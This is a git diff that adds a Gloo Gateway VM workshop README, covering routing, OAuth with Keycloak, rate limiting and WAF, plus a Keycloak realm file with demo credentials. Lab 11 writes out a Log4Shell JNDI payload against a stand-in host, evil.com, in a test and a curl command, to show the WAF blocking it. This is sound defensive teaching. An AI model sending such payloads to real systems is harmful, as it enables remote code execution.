diff --git a/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md b/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md index b5d8a7c5b0..1269a0141c 100644 --- a/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md +++ b/gloo-gateway/1-18/enterprise-istio-ambient/default/README.md @@ -881,7 +881,7 @@ helm repo update helm upgrade -i -n gloo-system \ gloo-gateway gloo-ee-helm/gloo-ee \ --create-namespace \ - --version 1.18.0-rc6 \ + --version 1.18.0 \ --kube-context $CLUSTER1 \ --set-string license_key=$LICENSE_KEY \ -f -< + + + +
+ +
+ +#
Gloo Gateway Workshop
+ + + +## Table of Contents +* [Introduction](#introduction) +* [Lab 1 - Deploy Gloo Gateway](#lab-1---deploy-gloo-gateway-) +* [Lab 2 - Deploy the httpbin demo app](#lab-2---deploy-the-httpbin-demo-app-) +* [Lab 3 - Expose the httpbin application through the gateway](#lab-3---expose-the-httpbin-application-through-the-gateway-) +* [Lab 4 - Delegate with control](#lab-4---delegate-with-control-) +* [Lab 5 - Modify the requests and responses](#lab-5---modify-the-requests-and-responses-) +* [Lab 6 - Split traffic between 2 backend services](#lab-6---split-traffic-between-2-backend-services-) +* [Lab 7 - Deploy Keycloak](#lab-7---deploy-keycloak-) +* [Lab 8 - Securing the access with OAuth](#lab-8---securing-the-access-with-oauth-) +* [Lab 9 - Use the transformation filter to manipulate headers](#lab-9---use-the-transformation-filter-to-manipulate-headers-) +* [Lab 10 - Apply rate limiting to the Gateway](#lab-10---apply-rate-limiting-to-the-gateway-) +* [Lab 11 - Use the Web Application Firewall filter](#lab-11---use-the-web-application-firewall-filter-) + + + +## Introduction + +Gloo Gateway is a feature-rich, fast, and flexible Kubernetes-native ingress controller and next-generation API gateway that is built on top of Envoy proxy and the Kubernetes Gateway API). + +Gloo Gateway is fully conformant with the Kubernetes Gateway API and extends its functionality with Solo’s custom Gateway APIs, such as `RouteOption`, `VirtualHostOption`, `Upstream`s, `RateLimitConfig`, or `AuthConfig`. +These resources help to centrally configure routing, security, and resiliency rules for a specific component, such as a host, route, or gateway listener. + +These capabilities are grouped into two editions of Gloo Gateway: + +### Open source (OSS) Gloo Gateway + +Use Kubernetes Gateway API-native features and the following Gloo Gateway extensions to configure basic routing, security, and resiliency capabilities: + +* Access logging +* Buffering +* Cross-Origin Resource Sharing (CORS) +* Cross-Site Request Forgery (CSRF) +* Fault injection +* Header control +* Retries +* Timeouts +* Traffic tapping +* Transformations + +### Gloo Gateway Enterprise Edition + +In addition to the features provided by the OSS edition, many more features are available in the Enterprise Edition, including: + +* External authentication and authorization +* External processing +* Data loss prevention +* Developer portal +* JSON web token (JWT) +* Rate limiting +* Response caching +* Web Application Filters + +### Want to learn more about Gloo Gateway? + +In the labs that follow we present some of the common patterns that our customers use and provide a good entry point into the workings of Gloo Gateway. + +You can find more information about Gloo Gateway in the official documentation: . + + + + +## Lab 1 - Deploy Gloo Gateway + + + +Download Gloo Gateway packages: + +```bash +gsutil cp gs://gloo-ee-vm/1.18.0/gloo-control.deb . +gsutil cp gs://gloo-ee-vm/1.18.0/gloo-gateway.deb . +gsutil cp gs://gloo-ee-vm/1.18.0/gloo-extensions.deb . +``` + +Deploy Redis on Docker: + +```bash +docker run --name some-redis -d -p 6379:6379 redis +``` + +Deploy the different Gloo Gateway components: + +```bash +sudo dpkg -i gloo-control.deb +sudo dpkg -i gloo-gateway.deb +sudo dpkg -i gloo-extensions.deb +``` + +Update the configuration: + +```bash +sudo sed -i "s/GLOO_LICENSE_KEY=/GLOO_LICENSE_KEY=${LICENSE_KEY}/" /etc/gloo/gloo-controller.env +sudo sed -i 's/GATEWAY_NAME=http-gateway/GATEWAY_NAME=http/' /etc/gloo/gloo-gateway.env +sudo sed -i 's/GATEWAY_NAMESPACE=default/GATEWAY_NAMESPACE=gloo-system/' /etc/gloo/gloo-gateway.env +sudo sed -i 's/CONTROLLER_HOST=gloo.gloo-system.svc.cluster.local/CONTROLLER_HOST=127.0.0.1/' /etc/gloo/gloo-gateway.env +sudo sed -i 's/GLOO_ADDRESS=gloo.gloo-system.svc.cluster.local/GLOO_ADDRESS=127.0.0.1/' /etc/gloo/gloo-extauth.env +sudo sed -i 's/HEALTH_HTTP_PORT=8084/HEALTH_HTTP_PORT=8085/' /etc/gloo/gloo-extauth.env +sudo sed -i 's/GLOO_ADDRESS=gloo.gloo-system.svc.cluster.local/GLOO_ADDRESS=127.0.0.1/' /etc/gloo/gloo-ratelimiter.env +``` + +Restart the services: + +```bash +sudo systemctl restart gloo-apiserver +sudo systemctl restart gloo-controller +sudo systemctl restart gloo-gateway +sudo systemctl restart gloo-extauth +sudo systemctl restart gloo-ratelimiter +``` + +The `gloo-control` package includes a `gloo-apiserver` service which is providing a Kubernetes API server. + +The `glooapi` CLI is used to interract with this Kubernetes API server, but the different labs are using kubectl, so we're going to create a function to automatically using `glooapi` instead: + + +Create an alias to use `glooapi` instead of `kubectl`: + +```bash +kubectl() { + if [ "$1" = "apply" ] && [ "$2" = "--context" ] && [ "$3" = "${CLUSTER1}" ]; then + shift 3 + command glooapi apply "$@" + elif [ "$1" = "create" ] && [ "$2" = "--context" ] && [ "$3" = "${CLUSTER1}" ]; then + shift 3 + command glooapi create "$@" + elif [ "$1" = "delete" ] && [ "$2" = "--context" ] && [ "$3" = "${CLUSTER1}" ]; then + shift 3 + command glooapi delete "$@" + else + command glooapi "$@" + fi +} +``` + + +Set the context environment variable: + +```bash +export CLUSTER1=cluster1 +``` + + + +## Lab 2 - Deploy the httpbin demo app + +We're going to deploy the httpbin application to demonstrate several features of Gloo Gateway. + +You can find more information about this application [here](http://httpbin.org/). + +Run the following commands to deploy the httpbin app twice (`httpbin1` and `httpbin2`). + +```bash +kubectl create --context ${CLUSTER1} ns httpbin + +docker run --name httpbin1 --hostname httpbin1 -d -p 8881:8080 mccutchen/go-httpbin:v2.14.0 /bin/go-httpbin -use-real-hostname +docker run --name httpbin2 --hostname httpbin2 -d -p 8882:8080 mccutchen/go-httpbin:v2.14.0 /bin/go-httpbin -use-real-hostname +``` + + + +We'll also create `Upstream` objects corresponding to these services: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + + + + +The team in charge of the gateway can create a `Gateway` resource and configure an HTTP listener. + + +But the gateway is going to listen on ports 8080 and 8443, so we need to redirect the traffic from the port 80 to the port 8080, and from the port 443 to the port 8443. + +```bash +# Expose the port 8080 on port 80 +sudo bash -c 'cat </etc/systemd/system/glooproxy-80.service +[Unit] +Description=HTTP Proxy +After=multi-user.target + +[Service] +Restart=always +RestartSec=5s +ExecStart=/usr/bin/socat tcp-l:80,fork,reuseaddr tcp:127.0.0.1:8080 + +[Install] +WantedBy=multi-user.target +EOF' + +# Expose the port 8443 on port 443 +sudo bash -c 'cat </etc/systemd/system/glooproxy-443.service +[Unit] +Description=HTTPS Proxy +After=multi-user.target + +[Service] +Restart=always +RestartSec=5s +ExecStart=/usr/bin/socat tcp-l:443,fork,reuseaddr tcp:127.0.0.1:8443 + +[Install] +WantedBy=multi-user.target +EOF' + +sudo systemctl daemon-reload +sudo systemctl enable glooproxy-80 +sudo systemctl start glooproxy-80 +sudo systemctl enable glooproxy-443 +sudo systemctl start glooproxy-443 +``` + + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +Configure your hosts file to resolve httpbin.example.com with the IP address of the proxy by executing the following command: + +```bash +./scripts/register-domain.sh httpbin.example.com ${PROXY_IP} +``` + +Try to access the application through HTTP: + +```shell +curl http://httpbin.example.com/get +``` + +Here is the expected output: + +```json,nocopy +{ + "args": {}, + "headers": { + "Accept": [ + "*/*" + ], + "Host": [ + "httpbin.example.com" + ], + "User-Agent": [ + "curl/8.5.0" + ], + "X-Forwarded-Proto": [ + "http" + ], + "X-Request-Id": [ + "d0998a48-7532-4eeb-ab69-23cef22185cf" + ] + }, + "method": "GET", + "origin": "127.0.0.6:38917", + "url": "http://httpbin.example.com/get" +} +``` + + + +Now, let's secure the access through TLS. +Let's first create a private key and a self-signed certificate: + +```bash +openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ + -keyout tls.key -out tls.crt -subj "/CN=*" +``` + +Then, you have to store it in a Kubernetes secret running the following command: + +```bash +kubectl create --context ${CLUSTER1} -n gloo-system secret tls tls-secret --key tls.key \ + --cert tls.crt +``` + +Update the `Gateway` resource to add HTTPS listeners. + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +```shell +curl -k https://httpbin.example.com/get +``` + +Here is the expected output: + +```json,nocopy +{ + "args": {}, + "headers": { + "Accept": [ + "*/*" + ], + "Host": [ + "httpbin.example.com" + ], + "User-Agent": [ + "curl/8.5.0" + ], + "X-Forwarded-Proto": [ + "https" + ], + "X-Request-Id": [ + "8e61c480-6373-4c38-824b-2bfe89e79d0c" + ] + }, + "method": "GET", + "origin": "127.0.0.6:52655", + "url": "https://httpbin.example.com/get" +} +``` + + + +The team in charge of the gateway can create an `HTTPRoute` to automatically redirect HTTP to HTTPS: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("location header correctly set", () => { + it('Checking text \'location\'', () => helpersHttp.checkHeaders({ host: `http://httpbin.example.com`, path: '/get', expectedHeaders: [{'key': 'location', 'value': `https://httpbin.example.com/get`}]})); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/expose-httpbin/tests/redirect-http-to-https.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + + +## Lab 4 - Delegate with control + +The team in charge of the gateway can create a parent `HTTPRoute` to delegate the routing of a domain or a path prefix (for example) to an application team. + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking text \'headers\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'headers', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/https.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +In the previous example, we've used a simple `/` prefix matcher for both the parent and the child `HTTPRoute`. + +But we'll often use the delegation capability to delegate a specific path to an application team. + +For example, let's say the team in charge of the gateway wants to delegate the `/status` prefix to the team in charge of the httpbin application. + +Let's update the parent `HTTPRoute`: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +In the child `HTTPRoute` we've indicated the absolute path (which includes the parent path), but instead we can inherite the parent matcher and use a relative path: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +The team in charge of the httpbin application can also take advantage of the `parentRefs` option to indicate which parent `HTTPRoute` can delegate to its own `HTTPRoute`. + +That's why you don't need to use `ReferenceGrant` objects when using delegation. + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Delegation offers another very nice feature. It automatically reorders all the matchers to avoid any short-circuiting. + +Let's add a second child `HTTPRoute` which is matching for any request starting with the path `/status`, but sends the requests to the second httpbin service. + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking \'200\' status code', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/status/200', retCode: 200 })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/status-200.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Check you can now also access the status `/status/201` path: + +```shell +curl -k https://httpbin.example.com/status/201 -w "%{http_code}" +``` + +Here is the expected output: + +```,nocopy +201 +``` + +You can use the following command to validate this request has been handled by the second httpbin application. + +```bash +docker logs httpbin2 | grep curl | grep 201 +``` + +You should get an output similar to: + +```log,nocopy +time="2024-07-22T16:04:53.3189" status=201 method="GET" uri="/status/201" size_bytes=0 duration_ms=0.02 user_agent="curl/7.81.0" client_ip=10.101.0.13:52424 +``` + + + +Let's delete the latest `HTTPRoute` and apply the original ones: + +```bash +kubectl delete --context ${CLUSTER1} -n httpbin httproute httpbin-status + +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("httpbin through HTTPS", () => { + it('Checking text \'headers\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'headers', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/delegation/tests/https.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + +## Lab 5 - Modify the requests and responses + +The Kubernetes Gateway API provides different options to add/update/remove request and response headers. + +Let's start with request headers. + +Update the `HTTPRoute` resource to do the following: +- add a new header `Foo` with the value `bar` +- update the value of the header `User-Agent` to `custom` +- remove the `To-Remove` header + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("request transformations applied", () => { + it('Checking text \'bar\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'bar', match: true })); + it('Checking text \'custom\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'custom', match: true })); + it('Checking text \'To-Remove\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', body: 'To-Remove', match: false })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/request-headers.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Another typical use case is to rewrite the hostname or the path before sending the request to the backend. + +Update the `HTTPRoute` resource to do the following: +- rewrite the hostname to `httpbin1.com` +- rewrite the path to `/get` + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("request rewrite applied", () => { + it('Checking text \'httpbin1.com/get\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/publicget', body: 'httpbin1.com/get', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/request-rewrite.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + +Let's now apply transformations to response headers. + +Update the `HTTPRoute` resource to do the following: +- add a new header `Foo` with the value `bar` +- update the value of the header `To-Modify` to `newvalue` +- remove the `To-Remove` header + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("response transformations applied", () => { + it('Checking \'Foo\' and \'To-Modify\' headers', () => helpersHttp.checkHeaders({ host: `https://httpbin.example.com`, path: '/response-headers?to-remove=whatever&to-modify=oldvalue', expectedHeaders: [{'key': 'foo', 'value': 'bar'}, {'key': 'to-modify', 'value': 'newvalue'}]})); + it('Checking text \'To-Remove\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/response-headers?to-remove=whatever&to-modify=oldvalue', body: 'To-Remove', match: false })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/response-headers.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Let's apply the original `HTTPRoute` yaml: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("request transformation applied", () => { + it('Checking text \'X-Client\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', headers: [{key: 'User-agent', value: 'curl/8.5.0'}], body: 'X-Client', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/x-client-request-header.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +As you can see, we've created a new header called `X-Client` by extracting some data from the `User-Agent` header using a regular expression. + +And we've targetted the `HTTPRoute` using the `targetRefs` of the `RouteOption` object. With this approach, it applies to all its rules. + +Another nice capability of the Gloo Gateway transformation filter is the capability to add a response header from some information present in the request. + +For example, we can add a `X-Request-Id` response header with the same value than the `X-Request-Id` request header. The user could use this information to report an issue he had with a specific request, for example. + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("response transformation applied", () => { + it('Checking \'X-Request-Id\' header', () => helpersHttp.checkHeaders({ host: `https://httpbin.example.com`, path: '/get', expectedHeaders: [{'key': 'x-request-id', 'value': '*'}]})); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/transformations/tests/x-request-id-response-header.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Let's apply the original `HTTPRoute` yaml: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +You can split traffic between different backends, with different weights. + +It's useful to slowly introduce a new version. + +Update the `HTTPRoute` resource to do the following: +- send 90% of the traffic to the `httpbin1` service +- send 10% of the traffic to the `httpbin2` service + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("traffic split applied", () => { + it('Checking text \'httpbin1\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/hostname', body: 'httpbin1', match: true })); + it('Checking text \'httpbin2\'', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/hostname', body: 'httpbin2', match: true })); +}) +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/traffic-split/tests/traffic-split.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + + +## Lab 7 - Deploy Keycloak + +In many use cases, you need to restrict the access to your applications to authenticated users. + +OpenID Connect (OIDC) is an identity layer on top of the OAuth 2.0 protocol. In OAuth 2.0 flows, authentication is performed by an external Identity Provider (IdP) which, in case of success, returns an Access Token representing the user identity. The protocol does not define the contents and structure of the Access Token, which greatly reduces the portability of OAuth 2.0 implementations. + +The goal of OIDC is to address this ambiguity by additionally requiring Identity Providers to return a well-defined ID Token. OIDC ID tokens follow the JSON Web Token standard and contain specific fields that your applications can expect and handle. This standardization allows you to switch between Identity Providers – or support multiple ones at the same time – with minimal, if any, changes to your downstream services; it also allows you to consistently apply additional security measures like Role-Based Access Control (RBAC) based on the identity of your users, i.e. the contents of their ID token. + +In this lab, we're going to install Keycloak. It will allow us to setup OIDC workflows later. + +First, we need to define an ID and secret for a "client", which will be the service that delegates to Keycloak for authorization: + +```bash +KEYCLOAK_CLIENT=gloo-ext-auth +KEYCLOAK_SECRET=hKcDcqmUKCrPkyDJtCw066hTLzUbAiri +``` + +We need to store these in a secret accessible by the ext auth service: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +In this step, we're going to secure the access to the `httpbin` service using OAuth. + +First, we need to create an `AuthConfig`, which is a CRD that contains authentication information. We've already got a secret named `oauth` that we can reference in this policy: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + + + + +If you refresh the web browser, you will be redirected to the authentication page. + +If you use the username `user1` and the password `password` you should be redirected back to the `httpbin` application. + +Notice that we are also extracting information from the `email` claim, and putting it into a new header. This can be used for different things during our authz/authn flow, but most importantly we don't need any jwt-decoding library in the application anymore! + +You can also perform authorization using OPA. + +First, you need to create a `ConfigMap` with the policy written in rego: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("Authentication is working properly", function () { + + const cookieString_user1 = process.env.USER1_COOKIE; + const cookieString_user2 = process.env.USER2_COOKIE; + + it("The httpbin page isn't accessible with user1", () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString_user1 }], retCode: "keycloak-session=dummy" == cookieString_user1 ? 302 : 403 })); + it("The httpbin page is accessible with user2", () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString_user2 }], retCode: 200 })); + +}); + +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/extauth-oauth/tests/authorization.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> +If you open the browser in incognito and login using the username `user2` and the password `password`, you will now be able to access it since the user's email ends with `@solo.io`. + + + + +## Lab 9 - Use the transformation filter to manipulate headers + + +In this step, we're going to use a regular expression to extract a part of an existing header and to create a new one: + +Let's update the `RouteOption` to extract the domain name from the email of the user. + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("Transformation is working properly", function() { + const cookieString = process.env.USER2_COOKIE; + it('The new header has been added', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString }], body: 'X-Organization' })); +}); + +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/advanced-transformations/tests/header-added.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + + + +## Lab 10 - Apply rate limiting to the Gateway + +In this step, we're going to apply rate limiting to the Gateway to only allow 3 requests per minute for the users of the `solo.io` organization. + +First, we need to create a `RateLimitConfig` object to define the limits: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const helpersHttp = require('./tests/chai-http'); + +describe("Rate limiting is working properly", function() { + const cookieString = process.env.USER2_COOKIE; + it('The httpbin page should be rate limited', () => helpersHttp.checkURL({ host: `https://httpbin.example.com`, path: '/get', headers: [{ key: 'Cookie', value: cookieString }], retCode: 429 })); +}); + +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/ratelimiting/tests/rate-limited.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +You should get a `200` response code the first 3 times and a `429` response code after. + +Let's apply the original `HTTPRoute` yaml: + +```bash +kubectl apply --context ${CLUSTER1} -f - < + +A web application firewall (WAF) protects web applications by monitoring, filtering, and blocking potentially harmful traffic and attacks that can overtake or exploit them. + +Gloo Gateway includes the ability to enable the ModSecurity Web Application Firewall for any incoming and outgoing HTTP connections. + +An example of how using Gloo Gateway we'd easily mitigate the recent Log4Shell vulnerability ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)), which for many enterprises was a major ordeal that took weeks and months of updating all services. + +The Log4Shell vulnerability impacted all Java applications that used the log4j library (common library used for logging) and that exposed an endpoint. You could exploit the vulnerability by simply making a request with a specific header. In the example below, we will show how to protect your services against the Log4Shell exploit. + +Using the Web Application Firewall capabilities you can reject requests containing such headers. + +Log4Shell attacks operate by passing in a Log4j expression that could trigger a lookup to a remote server, like a JNDI identity service. The malicious expression might look something like this: `${jndi:ldap://evil.com/x}`. It might be passed in to the service via a header, a request argument, or a request payload. What the attacker is counting on is that the vulnerable system will log that string using log4j without checking it. That's what triggers the destructive JNDI lookup and the ultimate execution of malicious code. + +You need to create the following `RouteOption`: + +```bash +kubectl apply --context ${CLUSTER1} -f - < ./test.js +const chaiExec = require("@jsdevtools/chai-exec"); +const helpersHttp = require('./tests/chai-http'); +var chai = require('chai'); +var expect = chai.expect; + +describe("WAF is working properly", function() { + it('The request has been blocked', () => helpersHttp.checkBody({ host: `https://httpbin.example.com`, path: '/get', headers: [{key: 'User-Agent', value: '${jndi:ldap://evil.com/x}'}], body: 'Log4Shell malicious payload' })); +}); +EOF +echo "executing test dist/gloo-gateway-workshop/build/templates/steps/apps/httpbin/waf/tests/waf.test.js.liquid" +timeout --signal=INT 3m mocha ./test.js --timeout 10000 --retries=120 --bail || { DEBUG_MODE=true mocha ./test.js --timeout 120000; exit 1; } +--> + +Run the following command to simulate an attack: + +```bash +curl -H "User-Agent: \${jndi:ldap://evil.com/x}" -k "https://httpbin.example.com/get" -i +``` + +The request should be rejected: + +```http,nocopy +HTTP/2 403 +content-length: 27 +content-type: text/plain +date: Tue, 05 Apr 2022 10:20:06 GMT +server: istio-envoy + +Log4Shell malicious payload +``` + +Let's delete the `RouteOption` we've created: + +```bash +kubectl delete --context ${CLUSTER1} -n gloo-system routeoption waf +``` + + + + diff --git a/gloo-gateway/1-18/enterprise-vm/default/data/.gitkeep b/gloo-gateway/1-18/enterprise-vm/default/data/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/gloo-gateway/1-18/enterprise-vm/default/data/steps/deploy-keycloak-docker/keycloak-realm.json b/gloo-gateway/1-18/enterprise-vm/default/data/steps/deploy-keycloak-docker/keycloak-realm.json new file mode 100644 index 0000000000..943594c294 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/data/steps/deploy-keycloak-docker/keycloak-realm.json @@ -0,0 +1,108 @@ +{ + "realm": "workshop", + "enabled": true, + "displayName": "solo.io", + "accessTokenLifespan": 1800, + "sslRequired": "none", + "users": [ + { + "username": "user1", + "enabled": true, + "email": "user1@example.com", + "attributes": { + "group": [ + "users" + ] + }, + "credentials": [ + { + "type": "password", + "secretData": "{\"value\":\"JsfNbCOIdZUbyBJ+BT+VoGI91Ec2rWLOvkLPDaX8e9k=\",\"salt\":\"P5rtFkGtPfoaryJ6PizUJw==\",\"additionalParameters\":{}}", + "credentialData": "{\"hashIterations\":27500,\"algorithm\":\"pbkdf2-sha256\",\"additionalParameters\":{}}" + } + ] + }, + { + "username": "user2", + "enabled": true, + "email": "user2@solo.io", + "attributes": { + "group": [ + "users" + ], + "show_personal_data": [ + "false" + ] + }, + "credentials": [ + { + "type": "password", + "secretData": "{\"value\":\"RITBVPdh5pvXOa4JzJ5pZTE0rG96zhnQNmSsKCf83aU=\",\"salt\":\"drB9e5Smf3cbfUfF3FUerw==\",\"additionalParameters\":{}}", + "credentialData": "{\"hashIterations\":27500,\"algorithm\":\"pbkdf2-sha256\",\"additionalParameters\":{}}" + } + ] + } + ], + "clients": [ + { + "clientId": "gloo-ext-auth", + "secret": "hKcDcqmUKCrPkyDJtCw066hTLzUbAiri", + "redirectUris": [ + "https://*" + ], + "webOrigins": [ + "+" + ], + "authorizationServicesEnabled": true, + "directAccessGrantsEnabled": true, + "serviceAccountsEnabled": true, + "protocolMappers": [ + { + "name": "group", + "protocol": "openid-connect", + "protocolMapper": "oidc-usermodel-attribute-mapper", + "config": { + "claim.name": "group", + "user.attribute": "group", + "access.token.claim": "true", + "id.token.claim": "true" + } + }, + { + "name": "show_personal_data", + "protocol": "openid-connect", + "protocolMapper": "oidc-usermodel-attribute-mapper", + "config": { + "claim.name": "show_personal_data", + "user.attribute": "show_personal_data", + "access.token.claim": "true", + "id.token.claim": "true" + } + }, + { + "name": "name", + "protocol": "openid-connect", + "protocolMapper": "oidc-usermodel-property-mapper", + "config": { + "claim.name": "name", + "user.attribute": "username", + "access.token.claim": "true", + "id.token.claim": "true" + } + } + ] + } + ], + "components": { + "org.keycloak.userprofile.UserProfileProvider": [ + { + "providerId": "declarative-user-profile", + "config": { + "kc.user.profile.config": [ + "{\"attributes\":[{\"name\":\"username\"},{\"name\":\"email\"}],\"unmanagedAttributePolicy\":\"ENABLED\"}" + ] + } + } + ] + } +} \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/.gitkeep b/gloo-gateway/1-18/enterprise-vm/default/images/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 